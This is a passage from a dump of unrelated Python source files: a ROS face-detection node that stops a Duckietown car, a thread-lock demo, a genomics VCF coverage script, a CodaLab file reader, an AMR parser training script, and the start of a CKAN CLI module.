image = cv2.imdecode(narr, cv2.CV_LOAD_IMAGE_COLOR)
# Initial opencv CascadeClassifier class to detect objects and import face detection module
faceCascade = cv2.CascadeClassifier('/home/ubuntu/duckietown/catkin_ws/src/spring2016_nctu/wama/face_detector/src/haarcascade_frontalface_default.xml')
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# Detect faces in the image
faces = faceCascade.detectMultiScale(gray,scaleFactor=2,minNeighbors=5,minSize=(10, 10),flags = cv2.cv.CV_HAAR_SCALE_IMAGE)
print "Found {0} faces!".format(len(faces))
# Draw face detections region proposals in the image
for (x, y, w, h) in faces:
cv2.rectangle(image, (x, y), (x+w, y+h), (0, 255, 0), 2)
# Convert cv image to ROS image message
image_msg_out = self.bridge.cv2_to_imgmsg(image, "bgr8")
image_msg_out.header.stamp = image_msg.header.stamp
# to do: use the pub_image_face publisher we initialized at line 27 to publish the image with face region proposals
self.pub_image_face.publish(image_msg_out)
# to do: initialize a car command message to publish, datatype: Twist2DStamped
car_control_msg = Twist2DStamped()
# to do: if faces are detected, use a stop command as the car control command
if len(faces) != 0:
# to do: set faces-detected as the face_detected scenario
self.face_detected = 1
# to do: use the stop command as the car command
car_control_msg.v = 0
car_control_msg.omega = 0
# to do: publish the car control command
self.publishCmd(car_control_msg)
# to do: if no faces are detected, set no-faces-detected as the face_detected scenario
if len(faces) == 0:
# to do: set no-faces-detected as the face_detected scenario
self.face_detected = 0
#car_control_msg.v=0
#car_control_msg.omega=0
#self.publishCmd(car_control_msg)
if __name__ == "__main__":
# to do: initial a node named "face_detector_X", X= you duckiebot name
rospy.init_node("face_detector_qwer",anonymous=False)
face_detector_wama_node = face_detector_wama()
rospy.spin()
|
ThreadSynchronization.py
|
import threading as th
from time import sleep
def sync_thread(s,lock):
lock.acquire()
print("["+s,end="")
try:
sleep(1)
except Exception as e:
print(e)
lock.release()
print("]")
if __name__ == "__main__":
lock = th.Lock()
t1 = th.Thread(target=sync_thread,args=("I",lock,))
t2 = th.Thread(target=sync_thread,args=("Love",lock,))
t3 = th.Thread(target=sync_thread,args=("Python",lock,))
t1.start()
sleep(1)
t2.start()
sleep(1)
t3.start()
t1.join()
t2.join()
t3.join()
|
vsnp_add_zero_coverage.py
|
#!/usr/bin/env python
import argparse
import multiprocessing
import os
import queue
import re
import shutil
import pandas
import pysam
from Bio import SeqIO
INPUT_BAM_DIR = 'input_bam_dir'
INPUT_VCF_DIR = 'input_vcf_dir'
OUTPUT_VCF_DIR = 'output_vcf_dir'
OUTPUT_METRICS_DIR = 'output_metrics_dir'
def get_base_file_name(file_path):
base_file_name = os.path.basename(file_path)
if base_file_name.find(".") > 0:
# Eliminate the extension.
return os.path.splitext(base_file_name)[0]
elif base_file_name.endswith("_vcf"):
# The "." character has likely
# changed to an "_" character.
return base_file_name[:-len("_vcf")]  # strip the "_vcf" suffix (rstrip would remove any trailing '_', 'v', 'c', 'f' chars)
return base_file_name
def get_coverage_and_snp_count(task_queue, reference, output_metrics, output_vcf, timeout):
while True:
try:
tup = task_queue.get(block=True, timeout=timeout)
except queue.Empty:
break
bam_file, vcf_file = tup
# Create a coverage dictionary.
coverage_dict = {}
coverage_list = pysam.depth(bam_file, split_lines=True)
for line in coverage_list:
chrom, position, depth = line.split('\t')
coverage_dict["%s-%s" % (chrom, position)] = depth
# Convert it to a data frame.
coverage_df = pandas.DataFrame.from_dict(coverage_dict, orient='index', columns=["depth"])
# Create a zero coverage dictionary.
zero_dict = {}
for record in SeqIO.parse(reference, "fasta"):
chrom = record.id
total_len = len(record.seq)
for pos in list(range(1, total_len + 1)):
zero_dict["%s-%s" % (str(chrom), str(pos))] = 0
# Convert it to a data frame with depth_x
# and depth_y columns - index is NaN.
zero_df = pandas.DataFrame.from_dict(zero_dict, orient='index', columns=["depth"])
coverage_df = zero_df.merge(coverage_df, left_index=True, right_index=True, how='outer')
# depth_x "0" column no longer needed.
coverage_df = coverage_df.drop(columns=['depth_x'])
coverage_df = coverage_df.rename(columns={'depth_y': 'depth'})
# Convert the NaN values to 0 coverage and get some metrics.
coverage_df = coverage_df.fillna(0)
coverage_df['depth'] = coverage_df['depth'].apply(int)
total_length = len(coverage_df)
average_coverage = coverage_df['depth'].mean()
zero_df = coverage_df[coverage_df['depth'] == 0]
total_zero_coverage = len(zero_df)
total_coverage = total_length - total_zero_coverage
genome_coverage = "{:.2%}".format(total_coverage / total_length)
# Process the associated VCF input.
column_names = ["CHROM", "POS", "ID", "REF", "ALT", "QUAL", "FILTER", "INFO", "FORMAT", "Sample"]
vcf_df = pandas.read_csv(vcf_file, sep='\t', header=None, names=column_names, comment='#')
good_snp_count = len(vcf_df[(vcf_df['ALT'].str.len() == 1) & (vcf_df['REF'].str.len() == 1) & (vcf_df['QUAL'] > 150)])
base_file_name = get_base_file_name(vcf_file)
if total_zero_coverage > 0:
header_file = "%s_header.csv" % base_file_name
with open(header_file, 'w') as outfile:
with open(vcf_file) as infile:
for line in infile:
if re.search('^#', line):
outfile.write("%s" % line)
vcf_df_snp = vcf_df[vcf_df['REF'].str.len() == 1]
vcf_df_snp = vcf_df_snp[vcf_df_snp['ALT'].str.len() == 1]
vcf_df_snp['ABS_VALUE'] = vcf_df_snp['CHROM'].map(str) + "-" + vcf_df_snp['POS'].map(str)
vcf_df_snp = vcf_df_snp.set_index('ABS_VALUE')
cat_df = pandas.concat([vcf_df_snp, zero_df], axis=1, sort=False)
cat_df = cat_df.drop(columns=['CHROM', 'POS', 'depth'])
cat_df[['ID', 'ALT', 'QUAL', 'FILTER', 'INFO']] = cat_df[['ID', 'ALT', 'QUAL', 'FILTER', 'INFO']].fillna('.')
cat_df['REF'] = cat_df['REF'].fillna('N')
cat_df['FORMAT'] = cat_df['FORMAT'].fillna('GT')
cat_df['Sample'] = cat_df['Sample'].fillna('./.')
cat_df['temp'] = cat_df.index.str.rsplit('-', n=1)
cat_df[['CHROM', 'POS']] = pandas.DataFrame(cat_df.temp.values.tolist(), index=cat_df.index)
cat_df = cat_df[['CHROM', 'POS', 'ID', 'REF', 'ALT', 'QUAL', 'FILTER', 'INFO', 'FORMAT', 'Sample']]
cat_df['POS'] = cat_df['POS'].astype(int)
cat_df = cat_df.sort_values(['CHROM', 'POS'])
body_file = "%s_body.csv" % base_file_name
cat_df.to_csv(body_file, sep='\t', header=False, index=False)
if output_vcf is None:
output_vcf_file = os.path.join(OUTPUT_VCF_DIR, "%s.vcf" % base_file_name)
else:
output_vcf_file = output_vcf
with open(output_vcf_file, "w") as outfile:
for cf in [header_file, body_file]:
with open(cf, "r") as infile:
for line in infile:
outfile.write("%s" % line)
else:
if output_vcf is None:
output_vcf_file = os.path.join(OUTPUT_VCF_DIR, "%s.vcf" % base_file_name)
else:
output_vcf_file = output_vcf
shutil.copyfile(vcf_file, output_vcf_file)
bam_metrics = [base_file_name, "", "%4f" % average_coverage, genome_coverage]
vcf_metrics = [base_file_name, str(good_snp_count), "", ""]
if output_metrics is None:
output_metrics_file = os.path.join(OUTPUT_METRICS_DIR, "%s.tabular" % base_file_name)
else:
output_metrics_file = output_metrics
metrics_columns = ["File", "Number of Good SNPs", "Average Coverage", "Genome Coverage"]
with open(output_metrics_file, "w") as fh:
fh.write("# %s\n" % "\t".join(metrics_columns))
fh.write("%s\n" % "\t".join(bam_metrics))
fh.write("%s\n" % "\t".join(vcf_metrics))
task_queue.task_done()
def set_num_cpus(num_files, processes):
num_cpus = int(multiprocessing.cpu_count())
if num_files < num_cpus and num_files < processes:
return num_files
if num_cpus < processes:
half_cpus = int(num_cpus / 2)
if num_files < half_cpus:
return num_files
return half_cpus
return processes
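# Illustrative examples of the worker-count logic above (hypothetical values): with 8 CPUs,
# 3 file pairs and --processes 4, the first branch returns 3 workers; with 8 CPUs, 100 file
# pairs and --processes 16, the request exceeds the CPU count, so half the CPUs (4) are used.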
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--output_metrics', action='store', dest='output_metrics', required=False, default=None, help='Output metrics text file')
parser.add_argument('--output_vcf', action='store', dest='output_vcf', required=False, default=None, help='Output VCF file')
parser.add_argument('--reference', action='store', dest='reference', help='Reference dataset')
parser.add_argument('--processes', action='store', dest='processes', type=int, help='User-selected number of processes to use for job splitting')
args = parser.parse_args()
# The assumption here is that the list of files
# in both INPUT_BAM_DIR and INPUT_VCF_DIR are
# equal in number and named such that they are
# properly matched if the directories contain
# more than 1 file (i.e., hopefully the bam file
# names and vcf file names will be something like
# Mbovis-01D6_* so they can be sorted and properly
# associated with each other).
bam_files = []
for file_name in sorted(os.listdir(INPUT_BAM_DIR)):
file_path = os.path.abspath(os.path.join(INPUT_BAM_DIR, file_name))
bam_files.append(file_path)
vcf_files = []
for file_name in sorted(os.listdir(INPUT_VCF_DIR)):
file_path = os.path.abspath(os.path.join(INPUT_VCF_DIR, file_name))
vcf_files.append(file_path)
multiprocessing.set_start_method('spawn')
queue1 = multiprocessing.JoinableQueue()
num_files = len(bam_files)
cpus = set_num_cpus(num_files, args.processes)
# Set a timeout for get()s in the queue.
timeout = 0.05
# Add each associated bam and vcf file pair to the queue.
for i, bam_file in enumerate(bam_files):
vcf_file = vcf_files[i]
queue1.put((bam_file, vcf_file))
# Complete the get_coverage_and_snp_count task.
processes = [multiprocessing.Process(target=get_coverage_and_snp_count, args=(queue1, args.reference, args.output_metrics, args.output_vcf, timeout, )) for _ in range(cpus)]
for p in processes:
p.start()
for p in processes:
p.join()
queue1.join()
if queue1.empty():
queue1.close()
queue1.join_thread()
|
reader.py
|
from contextlib import closing
import http.client
import os
import threading
import codalab.worker.download_util as download_util
from codalab.worker.download_util import get_target_path, PathException, BundleTarget
from codalab.worker.file_util import (
gzip_file,
gzip_bytestring,
read_file_section,
summarize_file,
tar_gzip_directory,
)
class Reader(object):
def __init__(self):
self.read_handlers = {
'get_target_info': self.get_target_info,
'stream_directory': self.stream_directory,
'stream_file': self.stream_file,
'read_file_section': self.read_file_section,
'summarize_file': self.summarize_file,
}
self.read_threads = [] # Threads
def read(self, run_state, path, read_args, reply):
read_type = read_args['type']
handler = self.read_handlers.get(read_type, None)
if handler:
handler(run_state, path, read_args, reply)
else:
err = (http.client.BAD_REQUEST, "Unsupported read_type for read: %s" % read_type)
reply(err)
def stop(self):
for thread in self.read_threads:
thread.join()
def _threaded_read(self, run_state, path, stream_fn, reply_fn):
"""
Given a run state, a path, a stream function and a reply function,
- Computes the real filesystem path to the path in the bundle
- In case of error, invokes reply_fn with an http error
- Otherwise starts a thread calling stream_fn on the computed final path
"""
try:
final_path = get_target_path(
run_state.bundle_path, BundleTarget(run_state.bundle.uuid, path)
)
except PathException as e:
reply_fn((http.client.NOT_FOUND, str(e)), None, None)
return
read_thread = threading.Thread(target=stream_fn, args=[final_path])
read_thread.start()
self.read_threads.append(read_thread)
def get_target_info(self, run_state, path, args, reply_fn):
"""
Return target_info of path in bundle as a message on the reply_fn
"""
target_info = None
dep_paths = set([dep.child_path for dep in run_state.bundle.dependencies.values()])
# if path is a dependency raise an error
if path and os.path.normpath(path) in dep_paths:
err = (
http.client.NOT_FOUND,
'{} not found in bundle {}'.format(path, run_state.bundle.uuid),
)
reply_fn(err, None, None)
return
else:
try:
target_info = download_util.get_target_info(
run_state.bundle_path, BundleTarget(run_state.bundle.uuid, path), args['depth']
)
except PathException as e:
err = (http.client.NOT_FOUND, str(e))
reply_fn(err, None, None)
return
if not path and args['depth'] > 0:
target_info['contents'] = [
child for child in target_info['contents'] if child['name'] not in dep_paths
]
# Object is not JSON serializable so submit its dict in API response
# The client is responsible for deserializing it
target_info['resolved_target'] = target_info['resolved_target'].__dict__
reply_fn(None, {'target_info': target_info}, None)
def stream_directory(self, run_state, path, args, reply_fn):
"""
Stream the directory at path using a separate thread
"""
dep_paths = set([dep.child_path for dep in run_state.bundle.dependencies.values()])
exclude_names = [] if path else dep_paths
def stream_thread(final_path):
with closing(tar_gzip_directory(final_path, exclude_names=exclude_names)) as fileobj:
reply_fn(None, {}, fileobj)
self._threaded_read(run_state, path, stream_thread, reply_fn)
def stream_file(self, run_state, path, args, reply_fn):
"""
Stream the file at path using a separate thread
"""
def stream_file(final_path):
with closing(gzip_file(final_path)) as fileobj:
reply_fn(None, {}, fileobj)
self._threaded_read(run_state, path, stream_file, reply_fn)
def read_file_section(self, run_state, path, args, reply_fn):
"""
Read the section of file at path of length args['length'] starting at
args['offset'] (bytes) using a separate thread
"""
def read_file_section_thread(final_path):
bytestring = gzip_bytestring(
read_file_section(final_path, args['offset'], args['length'])
)
reply_fn(None, {}, bytestring)
self._threaded_read(run_state, path, read_file_section_thread, reply_fn)
def summarize_file(self, run_state, path, args, reply_fn):
"""
Summarize the file including args['num_head_lines'] and
args['num_tail_lines'] but limited with args['max_line_length'] using
args['truncation_text'] on a separate thread
"""
def summarize_file_thread(final_path):
bytestring = gzip_bytestring(
summarize_file(
final_path,
args['num_head_lines'],
args['num_tail_lines'],
args['max_line_length'],
args['truncation_text'],
).encode()
)
reply_fn(None, {}, bytestring)
self._threaded_read(run_state, path, summarize_file_thread, reply_fn)
|
train.py
|
import argparse
import os
import random
import time
from elit.common.util import isdebugging
from elit.utils.log_util import cprint
if os.environ.get('USE_TF', None) is None:
os.environ["USE_TF"] = 'NO' # saves time loading transformers
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
from elit.transform.transformer_tokenizer import TransformerSequenceTokenizer
from elit.utils.time_util import CountdownTimer
from amr_parser.adam import AdamWeightDecayOptimizer
from amr_parser.bert_utils import load_bert, BertEncoderTokenizer
from amr_parser.data import Vocab, DataLoader, DUM, END, CLS, NIL, seperate_concept_from_rel
from amr_parser.extract import LexicalMap
from amr_parser.parser import Parser
from amr_parser.postprocess import PostProcessor
from amr_parser.utils import move_to_device
def parse_config():
parser = argparse.ArgumentParser()
parser.add_argument('--tok_vocab', type=str)
parser.add_argument('--lem_vocab', type=str)
parser.add_argument('--pos_vocab', type=str)
parser.add_argument('--ner_vocab', type=str)
parser.add_argument('--concept_vocab', type=str)
parser.add_argument('--predictable_concept_vocab', type=str)
parser.add_argument('--rel_vocab', type=str)
parser.add_argument('--word_char_vocab', type=str)
parser.add_argument('--concept_char_vocab', type=str)
parser.add_argument('--pretrained_file', type=str, default=None)
parser.add_argument('--with_bert', dest='with_bert', action='store_true')
parser.add_argument('--joint_arc_concept', dest='joint_arc_concept', action='store_true')
parser.add_argument('--levi_graph', dest='levi_graph', type=str, default=None)
parser.add_argument('--separate_rel', dest='separate_rel', action='store_true')
parser.add_argument('--extra_arc', dest='extra_arc', action='store_true')
parser.add_argument('--bert_path', type=str, default=None)
parser.add_argument('--word_char_dim', type=int)
parser.add_argument('--word_dim', type=int)
parser.add_argument('--pos_dim', type=int)
parser.add_argument('--ner_dim', type=int)
parser.add_argument('--concept_char_dim', type=int)
parser.add_argument('--concept_dim', type=int)
parser.add_argument('--rel_dim', type=int)
parser.add_argument('--cnn_filters', type=int, nargs='+')
parser.add_argument('--char2word_dim', type=int)
parser.add_argument('--char2concept_dim', type=int)
parser.add_argument('--embed_dim', type=int)
parser.add_argument('--ff_embed_dim', type=int)
parser.add_argument('--num_heads', type=int)
parser.add_argument('--snt_layers', type=int)
parser.add_argument('--graph_layers', type=int)
parser.add_argument('--inference_layers', type=int)
parser.add_argument('--dropout', type=float)
parser.add_argument('--unk_rate', type=float)
parser.add_argument('--epochs', type=int)
parser.add_argument('--max_batches_acm', type=int, default=60000)
parser.add_argument('--train_data', type=str)
parser.add_argument('--dev_data', type=str)
parser.add_argument('--train_batch_size', type=int)
parser.add_argument('--batches_per_update', type=int)
parser.add_argument('--dev_batch_size', type=int)
parser.add_argument('--lr_scale', type=float)
parser.add_argument('--warmup_steps', type=int)
parser.add_argument('--resume_ckpt', type=str, default=None)
parser.add_argument('--ckpt', type=str)
parser.add_argument('--print_every', type=int)
parser.add_argument('--eval_every', type=int)
parser.add_argument('--seed', type=int, default=int(time.time()))
parser.add_argument('--world_size', type=int)
parser.add_argument('--gpus', type=int)
parser.add_argument('--MASTER_ADDR', type=str)
parser.add_argument('--MASTER_PORT', type=str)
parser.add_argument('--start_rank', type=int)
args = parser.parse_args()
if args.levi_graph == 'true' or args.levi_graph == '1':
args.levi_graph = True
print(f'levi_graph = {args.levi_graph}')
return args
def average_gradients(model):
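# Synchronous data parallelism: all-reduce the summed gradients across workers, then divide
# by the world size so every replica ends up with the mean gradient before optimizer.step().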
size = float(dist.get_world_size())
for param in model.parameters():
if param.grad is not None:
dist.all_reduce(param.grad.data, op=dist.ReduceOp.SUM)
param.grad.data /= size
def update_lr(optimizer, lr_scale, embed_size, steps, warmup_steps):
lr = lr_scale * embed_size ** -0.5 * min(steps ** -0.5, steps * (warmup_steps ** -1.5))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
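# This looks like the "Noam" schedule used for Transformer training (a reading of the formula
# above, not a claim from the original authors): lr grows roughly linearly for the first
# warmup_steps updates and then decays as steps ** -0.5. For example, with embed_size=512 and
# warmup_steps=10000 the peak is lr_scale * 512 ** -0.5 * 10000 ** -0.5 ~= lr_scale * 4.4e-4.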
def data_proc(data, queue):
while True:
for x in data:
queue.put(x)
queue.put('EPOCHDONE')
def load_vocabs(args):
vocabs = dict()
vocabs['tok'] = Vocab(args.tok_vocab, 5, [CLS])
vocabs['lem'] = Vocab(args.lem_vocab, 5, [CLS])
vocabs['pos'] = Vocab(args.pos_vocab, 5, [CLS])
vocabs['ner'] = Vocab(args.ner_vocab, 5, [CLS])
vocabs['predictable_concept'] = Vocab(args.predictable_concept_vocab, 5, [DUM, END])
vocabs['concept'] = Vocab(args.concept_vocab, 5, [DUM, END])
vocabs['rel'] = Vocab(args.rel_vocab, 50, [NIL])
vocabs['word_char'] = Vocab(args.word_char_vocab, 100, [CLS, END])
vocabs['concept_char'] = Vocab(args.concept_char_vocab, 100, [CLS, END])
lexical_mapping = LexicalMap()
if args.separate_rel:
seperate_concept_from_rel(vocabs)
bert_encoder = None
if args.with_bert:
bert_tokenizer = BertEncoderTokenizer.from_pretrained(args.bert_path, do_lower_case=False)
# tokenizer = TransformerSequenceTokenizer(args.bert_path, 'token', use_fast=False, do_basic_tokenize=False,
# cls_is_bos=True)
vocabs['bert_tokenizer'] = bert_tokenizer
for name in vocabs:
if name == 'bert_tokenizer':
continue
print((name, vocabs[name].size, vocabs[name].coverage))
return vocabs, lexical_mapping
def main(local_rank, args):
vocabs, lexical_mapping = load_vocabs(args)
bert_encoder = None
if args.with_bert:
bert_encoder = load_bert(args.bert_path)
seed = args.seed
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
random.seed(seed)
torch.cuda.set_device(local_rank)
device = torch.device('cuda', local_rank)
model = Parser(vocabs,
args.word_char_dim, args.word_dim, args.pos_dim, args.ner_dim,
args.concept_char_dim, args.concept_dim,
args.cnn_filters, args.char2word_dim, args.char2concept_dim,
args.embed_dim, args.ff_embed_dim, args.num_heads, args.dropout,
args.snt_layers, args.graph_layers, args.inference_layers, args.rel_dim,
args.pretrained_file, bert_encoder,
device, joint_arc_concept=args.joint_arc_concept, levi_graph=args.levi_graph)
if args.world_size > 1:
torch.manual_seed(seed + dist.get_rank())
torch.cuda.manual_seed_all(seed + dist.get_rank())
random.seed(seed + dist.get_rank())
model = model.cuda(local_rank)
dev_data = DataLoader(vocabs, lexical_mapping, args.dev_data, args.dev_batch_size, for_train=False)
pp = PostProcessor(vocabs['rel'])
weight_decay_params = []
no_weight_decay_params = []
for name, param in model.named_parameters():
if name.endswith('bias') or 'layer_norm' in name:
no_weight_decay_params.append(param)
else:
weight_decay_params.append(param)
grouped_params = [{'params': weight_decay_params, 'weight_decay': 1e-4},
{'params': no_weight_decay_params, 'weight_decay': 0.}]
optimizer = AdamWeightDecayOptimizer(grouped_params, 1., betas=(0.9, 0.999), eps=1e-6)
used_batches = 0
batches_acm = 0
if args.resume_ckpt:
print(f'Resume from {args.resume_ckpt}')
ckpt = torch.load(args.resume_ckpt)
model.load_state_dict(ckpt['model'])
optimizer.load_state_dict(ckpt['optimizer'])
batches_acm = ckpt['batches_acm']
del ckpt
train_data = DataLoader(vocabs, lexical_mapping, args.train_data, args.train_batch_size, for_train=True,
levi_graph=args.levi_graph, extra_arc=args.extra_arc)
train_data.set_unk_rate(args.unk_rate)
debugging = isdebugging()
if debugging:
train_data_generator = iter(train_data)
else:
queue = mp.Queue(10)
train_data_generator = mp.Process(target=data_proc, args=(train_data, queue))
train_data_generator.start()
cprint(f'Model will be saved in [red]{args.ckpt}[/red]')
model.train()
epoch, loss_avg, concept_loss_avg, arc_loss_avg, rel_loss_avg = 0, 0, 0, 0, 0
max_batches_acm = args.max_batches_acm
timer = CountdownTimer(max_batches_acm - batches_acm)
shuffle_siblings = False
while batches_acm < max_batches_acm:
if not shuffle_siblings and batches_acm >= 50000 and train_data.shuffle_siblings:
shuffle_siblings = True
print('Switch to deterministic sibling order')
queue.close()
train_data_generator.terminate()
train_data = DataLoader(vocabs, lexical_mapping, args.train_data, args.train_batch_size, for_train=True,
shuffle_siblings=False, levi_graph=args.levi_graph, extra_arc=args.extra_arc)
train_data.set_unk_rate(args.unk_rate)
queue = mp.Queue(10)
train_data_generator = mp.Process(target=data_proc, args=(train_data, queue))
train_data_generator.start()
if debugging:
batch = next(train_data_generator)
else:
batch = queue.get()
if isinstance(batch, str):
epoch += 1
# print ('epoch', epoch, 'done', 'batches', batches_acm)
else:
batch = move_to_device(batch, model.device)
concept_loss, arc_loss, rel_loss, graph_arc_loss = model(batch)
if args.levi_graph:
if arc_loss > 10:
cprint(f'[red]'
f'WARNING: arc_loss = {float(arc_loss)} exploded! '
f'Please retrain {args.ckpt}'
f'[/red]')
loss = concept_loss + arc_loss
else:
loss = concept_loss + arc_loss + rel_loss
loss /= args.batches_per_update
loss_value = loss.item()
concept_loss_value = concept_loss.item()
arc_loss_value = arc_loss.item()
rel_loss_value = 0 if rel_loss is None else rel_loss.item()
loss_avg = loss_avg * args.batches_per_update * 0.8 + 0.2 * loss_value
concept_loss_avg = concept_loss_avg * 0.8 + 0.2 * concept_loss_value
arc_loss_avg = arc_loss_avg * 0.8 + 0.2 * arc_loss_value
rel_loss_avg = rel_loss_avg * 0.8 + 0.2 * rel_loss_value
loss.backward()
used_batches += 1
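# -1 % n equals n - 1, so the block below runs only once every args.batches_per_update
# batches, i.e. gradients are accumulated before a single optimizer step.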
if not (used_batches % args.batches_per_update == -1 % args.batches_per_update):
continue
batches_acm += 1
if args.world_size > 1:
average_gradients(model)
torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)
lr = update_lr(optimizer, args.lr_scale, args.embed_dim, batches_acm, args.warmup_steps)
optimizer.step()
optimizer.zero_grad()
timer.log('Train Epoch %d, LR %.6f, conc_loss %.3f, arc_loss %.3f, rel_loss %.3f' % (
epoch, lr, concept_loss_avg, arc_loss_avg, rel_loss_avg), ratio_percentage=False)
if batches_acm % args.print_every == -1 % args.print_every:
# print ('Train Epoch %d, Batch %d, LR %.6f, conc_loss %.3f, arc_loss %.3f, rel_loss %.3f'%(epoch, batches_acm, lr, concept_loss_avg, arc_loss_avg, rel_loss_avg))
model.train()
if (
batches_acm > 50000 or args.resume_ckpt is not None) and batches_acm % args.eval_every == -1 % args.eval_every:
# model.eval()
torch.save({'args': args,
'model': model.state_dict(),
'batches_acm': batches_acm,
'optimizer': optimizer.state_dict()},
'%s/epoch%d_batch%d' % (args.ckpt, epoch, batches_acm))
# parse_data(model, pp, dev_data, args.dev_data,
# '%s/epoch%d_batch%d_dev_out' % (args.ckpt, epoch, batches_acm))
# model.train()
queue.close()
train_data_generator.terminate()
def init_processes(local_rank, args, backend='nccl'):
os.environ['MASTER_ADDR'] = args.MASTER_ADDR
os.environ['MASTER_PORT'] = args.MASTER_PORT
dist.init_process_group(backend, rank=args.start_rank + local_rank, world_size=args.world_size)
main(local_rank, args)
if __name__ == "__main__":
args = parse_config()
if not os.path.exists(args.ckpt):
os.mkdir(args.ckpt)
assert len(args.cnn_filters) % 2 == 0
args.cnn_filters = list(zip(args.cnn_filters[:-1:2], args.cnn_filters[1::2]))
if args.world_size == 1 or True:
main(0, args)
exit(0)
mp.spawn(init_processes, args=(args,), nprocs=args.gpus)
|
cli.py
|
# encoding: utf-8
import collections
import csv
import multiprocessing as mp
import os
import datetime
import sys
from pprint import pprint
import re
import itertools
import json
import logging
import urlparse
from optparse import OptionConflictError
import traceback
import sqlalchemy as sa
import routes
import paste.script
from paste.registry import Registry
from paste.script.util.logging_config import fileConfig
import click
import ckan.logic as logic
import ckan.model as model
import ckan.include.rjsmin as rjsmin
import ckan.include.rcssmin as rcssmin
import ckan.lib.fanstatic_resources as fanstatic_resources
import ckan.plugins as p
from ckan.common import config
#NB No CKAN imports are allowed until after the config file is loaded.
# i.e. do the imports in methods, after _load_config is called.
# Otherwise loggers get disabled.
def deprecation_warning(message=None):
'''
Print a deprecation warning to STDERR.
If ``message`` is given it is also printed to STDERR.
'''
sys.stderr.write(u'WARNING: This function is deprecated.')
if message:
sys.stderr.write(u' ' + message.strip())
sys.stderr.write(u'\n')
def error(msg):
'''
Print an error message to STDOUT and exit with return code 1.
'''
sys.stderr.write(msg)
if not msg.endswith('\n'):
sys.stderr.write('\n')
sys.exit(1)
def parse_db_config(config_key='sqlalchemy.url'):
''' Takes a config key for a database connection url and parses it into
a dictionary. Expects a url like:
'postgres://tester:pass@localhost/ckantest3'
'''
from ckan.common import config
url = config[config_key]
regex = [
'^\s*(?P<db_type>\w*)',
'://',
'(?P<db_user>[^:]*)',
':?',
'(?P<db_pass>[^@]*)',
'@',
'(?P<db_host>[^/:]*)',
':?',
'(?P<db_port>[^/]*)',
'/',
'(?P<db_name>[\w.-]*)'
]
db_details_match = re.match(''.join(regex), url)
if not db_details_match:
raise Exception('Could not extract db details from url: %r' % url)
db_details = db_details_match.groupdict()
return db_details
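# For the example url in the docstring, the returned dict would look roughly like:
#   {'db_type': 'postgres', 'db_user': 'tester', 'db_pass': 'pass',
#    'db_host': 'localhost', 'db_port': '', 'db_name': 'ckantest3'}
# (db_port is empty because the url has no ':port' component).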
def user_add(args):
'''Add new user if we use paster sysadmin add
or paster user add
'''
if len(args) < 1:
error('Error: you need to specify the user name.')
username = args[0]
# parse args into data_dict
data_dict = {'name': username}
for arg in args[1:]:
try:
field, value = arg.split('=', 1)
data_dict[field] = value
except ValueError:
raise ValueError(
'Could not parse arg: %r (expected "<option>=<value>")' % arg
)
# Required
while not data_dict.get('email'):
data_dict['email'] = raw_input('Email address: ')
if 'password' not in data_dict:
data_dict['password'] = UserCmd.password_prompt()
# Optional
if 'fullname' in data_dict:
data_dict['fullname'] = data_dict['fullname'].decode(
sys.getfilesystemencoding()
)
print('Creating user: %r' % username)
try:
import ckan.logic as logic
import ckan.model as model
site_user = logic.get_action('get_site_user')({
'model': model,
'ignore_auth': True},
{}
)
context = {
'model': model,
'session': model.Session,
'ignore_auth': True,
'user': site_user['name'],
}
user_dict = logic.get_action('user_create')(context, data_dict)
pprint(user_dict)
except logic.ValidationError, e:
error(traceback.format_exc())
## from http://code.activestate.com/recipes/577058/ MIT licence.
## Written by Trent Mick
def query_yes_no(question, default="yes"):
"""Ask a yes/no question via raw_input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is one of "yes" or "no".
"""
valid = {"yes": "yes", "y": "yes", "ye": "yes",
"no": "no", "n": "no"}
if default is None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while 1:
sys.stdout.write(question + prompt)
choice = raw_input().lower()
if default is not None and choice == '':
return default
elif choice in valid.keys():
return valid[choice]
else:
sys.stdout.write("Please respond with 'yes' or 'no' "\
"(or 'y' or 'n').\n")
class MockTranslator(object):
def gettext(self, value):
return value
def ugettext(self, value):
return value
def ungettext(self, singular, plural, n):
if n > 1:
return plural
return singular
def _get_config(config=None):
from paste.deploy import appconfig
if config:
filename = os.path.abspath(config)
config_source = '-c parameter'
elif os.environ.get('CKAN_INI'):
filename = os.environ.get('CKAN_INI')
config_source = '$CKAN_INI'
else:
default_filename = 'development.ini'
filename = os.path.join(os.getcwd(), default_filename)
if not os.path.exists(filename):
# give really clear error message for this common situation
msg = 'ERROR: You need to specify the CKAN config (.ini) '\
'file path.'\
'\nUse the --config parameter or set environment ' \
'variable CKAN_INI or have {}\nin the current directory.' \
.format(default_filename)
exit(msg)
if not os.path.exists(filename):
msg = 'Config file not found: %s' % filename
msg += '\n(Given by: %s)' % config_source
exit(msg)
fileConfig(filename)
return appconfig('config:' + filename)
def load_config(config, load_site_user=True):
conf = _get_config(config)
assert 'ckan' not in dir() # otherwise loggers would be disabled
# We have now loaded the config. Now we can import ckan for the
# first time.
from ckan.config.environment import load_environment
load_environment(conf.global_conf, conf.local_conf)
registry = Registry()
registry.prepare()
import pylons
registry.register(pylons.translator, MockTranslator())
if model.user_table.exists() and load_site_user:
# If the DB has already been initialized, create and register
# a pylons context object, and add the site user to it, so the
# auth works as in a normal web request
c = pylons.util.AttribSafeContextObj()
registry.register(pylons.c, c)
site_user = logic.get_action('get_site_user')({'ignore_auth': True}, {})
pylons.c.user = site_user['name']
pylons.c.userobj = model.User.get(site_user['name'])
## give routes enough information to run url_for
parsed = urlparse.urlparse(conf.get('ckan.site_url', 'http://0.0.0.0'))
request_config = routes.request_config()
request_config.host = parsed.netloc + parsed.path
request_config.protocol = parsed.scheme
def paster_click_group(summary):
'''Return a paster command click.Group for paster subcommands
:param command: the paster command linked to this function from
setup.py, used in help text (e.g. "datastore")
:param summary: summary text used in paster's help/command listings
